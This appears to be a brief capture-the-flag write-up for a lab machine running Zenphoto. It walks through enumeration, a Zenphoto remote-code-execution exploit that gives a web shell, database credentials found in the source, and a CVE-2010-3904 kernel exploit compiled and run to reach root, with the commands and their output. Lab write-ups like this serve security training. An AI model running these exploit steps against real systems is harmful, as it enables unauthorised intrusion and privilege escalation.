Zenphoto
Enumeration
- Scanned open ports and found port 80 is open
- http://192.168.116.41/
- Ran
dirbusterwithseclists/Discovery/Web-Content/Dirbuster...big.txt - found
/testdir

- Source code revealed the version and service

- Searched for exploits

Exploitation
- Executed https://www.exploit-db.com/exploits/18083 and got shell access
┌──(kali㉿hd)-[~/ctf/pvg/zenphoto]
└─$ php a.php $ip /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Got stable shell from penelope
- Enumerated source code, found db credentials
root:hola, accessed db but no useful data was found - Ran linpeas for priv-esc enum
Privilege Escalation
- Found out that the kernel is vulnerable to multiple CVEs
- Among all
CVE-2010-3904worked - https://www.exploit-db.com/exploits/15285
www-data@offsecsrv:/tmp$ gcc exploit.c
www-data@offsecsrv:/tmp$ ./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# cat /root/root.txt
cat: /root/root.txt: No such file or directory
# cd /root
# cat proof.txt
<root_flag>